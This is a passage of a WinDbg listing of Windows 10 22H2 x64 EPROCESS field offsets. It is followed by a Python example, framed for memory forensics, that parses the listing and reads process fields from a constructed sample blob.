+0x464 ProcessSelfDelete : Pos 30, 1 Bit
+0x464 SetTimerResolutionLink : Pos 31, 1 Bit
+0x468 CreateTime : _LARGE_INTEGER
+0x470 ProcessQuotaUsage : [2] Uint8B
+0x480 ProcessQuotaPeak : [2] Uint8B
+0x490 PeakVirtualSize : Uint8B
+0x498 VirtualSize : Uint8B
+0x4a0 SessionProcessLinks : _LIST_ENTRY
+0x4b0 ExceptionPortData : Ptr64 Void
+0x4b0 ExceptionPortValue : Uint8B
+0x4b0 ExceptionPortState : Pos 0, 3 Bits
+0x4b8 Token : _EX_FAST_REF
+0x4c0 MmReserved : Uint8B
+0x4c8 AddressCreationLock : _EX_PUSH_LOCK
+0x4d0 PageTableCommitmentLock : _EX_PUSH_LOCK
+0x4d8 RotateInProgress : Ptr64 _ETHREAD
+0x4e0 ForkInProgress : Ptr64 _ETHREAD
+0x4e8 CommitChargeJob : Ptr64 _EJOB
+0x4f0 CloneRoot : _RTL_AVL_TREE
+0x4f8 NumberOfPrivatePages : Uint8B
+0x500 NumberOfLockedPages : Uint8B
+0x508 Win32Process : Ptr64 Void
+0x510 Job : Ptr64 _EJOB
+0x518 SectionObject : Ptr64 Void
+0x520 SectionBaseAddress : Ptr64 Void
+0x528 Cookie : Uint4B
+0x530 WorkingSetWatch : Ptr64 _PAGEFAULT_HISTORY
+0x538 Win32WindowStation : Ptr64 Void
+0x540 InheritedFromUniqueProcessId : Ptr64 Void
+0x548 OwnerProcessId : Uint8B
+0x550 Peb : Ptr64 _PEB
+0x558 Session : Ptr64 _MM_SESSION_SPACE
+0x560 Spare1 : Ptr64 Void
+0x568 QuotaBlock : Ptr64 _EPROCESS_QUOTA_BLOCK
+0x570 ObjectTable : Ptr64 _HANDLE_TABLE
+0x578 DebugPort : Ptr64 Void
+0x580 WoW64Process : Ptr64 _EWOW64PROCESS
+0x588 DeviceMap : Ptr64 Void
+0x590 EtwDataSource : Ptr64 Void
+0x598 PageDirectoryPte : Uint8B
+0x5a0 ImageFilePointer : Ptr64 _FILE_OBJECT
+0x5a8 ImageFileName : [15] UChar
+0x5b7 PriorityClass : UChar
+0x5b8 SecurityPort : Ptr64 Void
+0x5c0 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO
+0x5c8 JobLinks : _LIST_ENTRY
+0x5d8 HighestUserAddress : Ptr64 Void
+0x5e0 ThreadListHead : _LIST_ENTRY
+0x5f0 ActiveThreads : Uint4B
+0x5f4 ImagePathHash : Uint4B
+0x5f8 DefaultHardErrorProcessing : Uint4B
+0x5fc LastThreadExitStatus : Int4B
+0x600 PrefetchTrace : _EX_FAST_REF
+0x608 LockedPagesList : Ptr64 Void
+0x610 ReadOperationCount : _LARGE_INTEGER
+0x618 WriteOperationCount : _LARGE_INTEGER
+0x620 OtherOperationCount : _LARGE_INTEGER
+0x628 ReadTransferCount : _LARGE_INTEGER
+0x630 WriteTransferCount : _LARGE_INTEGER
+0x638 OtherTransferCount : _LARGE_INTEGER
+0x640 CommitChargeLimit : Uint8B
+0x648 CommitCharge : Uint8B
+0x650 CommitChargePeak : Uint8B
+0x680 Vm : _MMSUPPORT_FULL
+0x7c0 MmProcessLinks : _LIST_ENTRY
+0x7d0 ModifiedPageCount : Uint4B
+0x7d4 ExitStatus : Int4B
+0x7d8 VadRoot : _RTL_AVL_TREE
+0x7e0 VadHint : Ptr64 Void
+0x7e8 VadCount : Uint8B
+0x7f0 VadPhysicalPages : Uint8B
+0x7f8 VadPhysicalPagesLimit : Uint8B
+0x800 AlpcContext : _ALPC_PROCESS_CONTEXT
+0x820 TimerResolutionLink : _LIST_ENTRY
+0x830 TimerResolutionStackRecord : Ptr64 _PO_DIAG_STACK_RECORD
+0x838 RequestedTimerResolution : Uint4B
+0x83c SmallestTimerResolution : Uint4B
+0x840 ExitTime : _LARGE_INTEGER
+0x848 InvertedFunctionTable : Ptr64 _INVERTED_FUNCTION_TABLE
+0x850 InvertedFunctionTableLock : _EX_PUSH_LOCK
+0x858 ActiveThreadsHighWatermark : Uint4B
+0x85c LargePrivateVadCount : Uint4B
+0x860 ThreadListLock : _EX_PUSH_LOCK
+0x868 WnfContext : Ptr64 Void
+0x870 ServerSilo : Ptr64 _EJOB
+0x878 SignatureLevel : UChar
+0x879 SectionSignatureLevel : UChar
+0x87a Protection : _PS_PROTECTION
+0x87b HangCount : Pos 0, 3 Bits
+0x87b GhostCount : Pos 3, 3 Bits
+0x87b PrefilterException : Pos 6, 1 Bit
+0x87c Flags3 : Uint4B
+0x87c Minimal : Pos 0, 1 Bit
+0x87c ReplacingPageRoot : Pos 1, 1 Bit
+0x87c Crashed : Pos 2, 1 Bit
+0x87c JobVadsAreTracked : Pos 3, 1 Bit
+0x87c VadTrackingDisabled : Pos 4, 1 Bit
+0x87c AuxiliaryProcess : Pos 5, 1 Bit
+0x87c SubsystemProcess : Pos 6, 1 Bit
+0x87c IndirectCpuSets : Pos 7, 1 Bit
+0x87c RelinquishedCommit : Pos 8, 1 Bit
+0x87c HighGraphicsPriority : Pos 9, 1 Bit
+0x87c CommitFailLogged : Pos 10, 1 Bit
+0x87c ReserveFailLogged : Pos 11, 1 Bit
+0x87c SystemProcess : Pos 12, 1 Bit
+0x87c HideImageBaseAddresses : Pos 13, 1 Bit
+0x87c AddressPolicyFrozen : Pos 14, 1 Bit
+0x87c ProcessFirstResume : Pos 15, 1 Bit
+0x87c ForegroundExternal : Pos 16, 1 Bit
+0x87c ForegroundSystem : Pos 17, 1 Bit
+0x87c HighMemoryPriority : Pos 18, 1 Bit
+0x87c EnableProcessSuspendResumeLogging : Pos 19, 1 Bit
+0x87c EnableThreadSuspendResumeLogging : Pos 20, 1 Bit
+0x87c SecurityDomainChanged : Pos 21, 1 Bit
+0x87c SecurityFreezeComplete : Pos 22, 1 Bit
+0x87c VmProcessorHost : Pos 23, 1 Bit
+0x87c VmProcessorHostTransition : Pos 24, 1 Bit
+0x87c AltSyscall : Pos 25, 1 Bit
+0x87c TimerResolutionIgnore : Pos 26, 1 Bit
+0x87c DisallowUserTerminate : Pos 27, 1 Bit
+0x880 DeviceAsid : Int4B
+0x888 SvmData : Ptr64 Void
+0x890 SvmProcessLock : _EX_PUSH_LOCK
+0x898 SvmLock : Uint8B
+0x8a0 SvmProcessDeviceListHead : _LIST_ENTRY
+0x8b0 LastFreezeInterruptTime : Uint8B
+0x8b8 DiskCounters : Ptr64 _PROCESS_DISK_COUNTERS
+0x8c0 PicoContext : Ptr64 Void
+0x8c8 EnclaveTable : Ptr64 Void
+0x8d0 EnclaveNumber : Uint8B
+0x8d8 EnclaveLock : _EX_PUSH_LOCK
+0x8e0 HighPriorityFaultsAllowed : Uint4B
+0x8e8 EnergyContext : Ptr64 _PO_PROCESS_ENERGY_CONTEXT
+0x8f0 VmContext : Ptr64 Void
+0x8f8 SequenceNumber : Uint8B
+0x900 CreateInterruptTime : Uint8B
+0x908 CreateUnbiasedInterruptTime : Uint8B
+0x910 TotalUnbiasedFrozenTime : Uint8B
+0x918 LastAppStateUpdateTime : Uint8B
+0x920 LastAppStateUptime : Pos 0, 61 Bits
+0x920 LastAppState : Pos 61, 3 Bits
+0x928 SharedCommitCharge : Uint8B
+0x930 SharedCommitLock : _EX_PUSH_LOCK
+0x938 SharedCommitLinks : _LIST_ENTRY
+0x948 AllowedCpuSets : Uint8B
+0x950 DefaultCpuSets : Uint8B
+0x948 AllowedCpuSetsIndirect : Ptr64 Uint8B
+0x950 DefaultCpuSetsIndirect : Ptr64 Uint8B
+0x958 DiskIoAttribution : Ptr64 Void
+0x960 DxgProcess : Ptr64 Void
+0x968 Win32KFilterSet : Uint4B
+0x970 ProcessTimerDelay : _PS_INTERLOCKED_TIMER_DELAY_VALUES
+0x978 KTimerSets : Uint4B
+0x97c KTimer2Sets : Uint4B
+0x980 ThreadTimerSets : Uint4B
+0x988 VirtualTimerListLock : Uint8B
+0x990 VirtualTimerListHead : _LIST_ENTRY
+0x9a0 WakeChannel : _WNF_STATE_NAME
+0x9a0 WakeInfo : _PS_PROCESS_WAKE_INFORMATION
+0x9d0 MitigationFlags : Uint4B
+0x9d0 MitigationFlagsValues : <anonymous-tag>
+0x9d4 MitigationFlags2 : Uint4B
+0x9d4 MitigationFlags2Values : <anonymous-tag>
+0x9d8 PartitionObject : Ptr64 Void
+0x9e0 SecurityDomain : Uint8B
+0x9e8 ParentSecurityDomain : Uint8B
+0x9f0 CoverageSamplerContext : Ptr64 Void
+0x9f8 MmHotPatchContext : Ptr64 Void
+0xa00 DynamicEHContinuationTargetsTree : _RTL_AVL_TREE
+0xa08 DynamicEHContinuationTargetsLock : _EX_PUSH_LOCK
+0xa10 DynamicEnforcedCetCompatibleRanges : _PS_DYNAMIC_ENFORCED_ADDRESS_RANGES
+0xa20 DisabledComponentFlags : Uint4B
+0xa28 PathRedirectionHashes : Ptr64 Uint4B
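Because these offsets shift between builds, forensics and detection tooling should consume the `dt` listing rather than hard-code numbers. The following Python is an added example, not code from this page or its author: it parses an excerpt of the 22H2 listing above into an offset table (handling the bitfield and union members that share an offset), then uses that table to read the PID, parent PID, ImageFileName and the ProcessExiting bit from a constructed x64 EPROCESS byte image, and recovers an EPROCESS base from an ActiveProcessLinks Flink value the way CONTAINING_RECORD does. The listing excerpt is copied from the page; the byte blob and the Flink value in it are constructed sample data.

```python
"""
Parse WinDbg `dt nt!_EPROCESS` output into an offset table and apply it to a
raw EPROCESS image.  Added example for this page; not the blog author's code.
SAMPLE_DT is an excerpt of the Windows 10 22H2 x64 listing on the page; the
byte blob built below is constructed test data, not a real memory dump.
"""
import re
import struct
from dataclasses import dataclass
from typing import Dict, Optional

# One `dt` member line, e.g. "+0x440 UniqueProcessId : Ptr64 Void"
DT_LINE = re.compile(r"^\s*\+0x(?P<off>[0-9a-fA-F]+)\s+(?P<name>\w+)\s*:\s*(?P<type>.+?)\s*$")
# Bitfield member type, e.g. "Pos 2, 1 Bit" or "Pos 12, 3 Bits"
BITFIELD = re.compile(r"^Pos (?P<pos>\d+), (?P<bits>\d+) Bits?$")

SAMPLE_DT = """\
0: kd> dt nt!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x438 ProcessLock : _EX_PUSH_LOCK
+0x440 UniqueProcessId : Ptr64 Void
+0x448 ActiveProcessLinks : _LIST_ENTRY
+0x464 Flags : Uint4B
+0x464 CreateReported : Pos 0, 1 Bit
+0x464 ProcessExiting : Pos 2, 1 Bit
+0x4b8 Token : _EX_FAST_REF
+0x540 InheritedFromUniqueProcessId : Ptr64 Void
+0x550 Peb : Ptr64 _PEB
+0x5a8 ImageFileName : [15] UChar
+0x5b7 PriorityClass : UChar
+0x87a Protection : _PS_PROTECTION
"""


@dataclass
class Field:
    offset: int
    type_name: str
    bit_pos: Optional[int] = None  # only set for bitfield members
    bit_len: Optional[int] = None


def parse_dt_output(text: str) -> Dict[str, Field]:
    """Map each member name to its offset and type. Union members and bitfields
    legitimately share an offset (e.g. Flags and its bits all sit at +0x464)."""
    fields: Dict[str, Field] = {}
    for line in text.splitlines():
        m = DT_LINE.match(line)
        if not m:
            continue  # the "0: kd>" prompt line, blank lines, etc.
        off, name, typ = int(m.group("off"), 16), m.group("name"), m.group("type")
        bf = BITFIELD.match(typ)
        if bf:
            fields[name] = Field(off, "bitfield", int(bf.group("pos")), int(bf.group("bits")))
        else:
            fields[name] = Field(off, typ)
    return fields


def build_sample_eprocess() -> bytes:
    """Constructed x64 EPROCESS image laid out per the 22H2 offsets above."""
    blob = bytearray(0xA30)
    struct.pack_into("<Q", blob, 0x440, 0x1234)              # UniqueProcessId
    struct.pack_into("<Q", blob, 0x448, 0xFFFFA1000ABCD448)  # ActiveProcessLinks.Flink (made up)
    struct.pack_into("<I", blob, 0x464, 0x5)                 # Flags: CreateReported | ProcessExiting
    struct.pack_into("<Q", blob, 0x540, 0x4)                 # InheritedFromUniqueProcessId (System)
    blob[0x5A8:0x5A8 + 12] = b"notepad.exe\0"                # ImageFileName[15]
    return bytes(blob)


def read_process_summary(blob: bytes, fields: Dict[str, Field]) -> dict:
    """Pull the forensically interesting members out of a raw EPROCESS using the
    parsed offsets, so the same code works on another build once re-parsed."""
    def u64(name: str) -> int:
        return struct.unpack_from("<Q", blob, fields[name].offset)[0]

    def bit(name: str) -> int:
        f = fields[name]
        word = struct.unpack_from("<I", blob, f.offset)[0]
        return (word >> f.bit_pos) & ((1 << f.bit_len) - 1)

    name_field = fields["ImageFileName"]
    name_len = int(re.match(r"\[(\d+)\]", name_field.type_name).group(1))
    raw = blob[name_field.offset:name_field.offset + name_len]
    return {
        "pid": u64("UniqueProcessId"),
        "ppid": u64("InheritedFromUniqueProcessId"),
        "image": raw.split(b"\0", 1)[0].decode("ascii", "replace"),
        "exiting": bit("ProcessExiting"),
        "flink": u64("ActiveProcessLinks"),  # LIST_ENTRY.Flink is its first QWORD
    }


def eprocess_from_link(link_va: int, fields: Dict[str, Field]) -> int:
    """CONTAINING_RECORD: Flink points at the next process's ActiveProcessLinks
    member, so subtract that member's offset to get the EPROCESS base address."""
    return link_va - fields["ActiveProcessLinks"].offset


if __name__ == "__main__":
    table = parse_dt_output(SAMPLE_DT)
    info = read_process_summary(build_sample_eprocess(), table)
    print(info)
    print(hex(eprocess_from_link(info["flink"], table)))
```

Feeding the full `dt nt!_EPROCESS` output of a different build into `parse_dt_output` is all that is needed to retarget the readers; nothing in `read_process_summary` carries a hard-coded offset. The same table is what a memory-forensics profile or a driver that wants to validate its compiled-in offsets at load time would be built from.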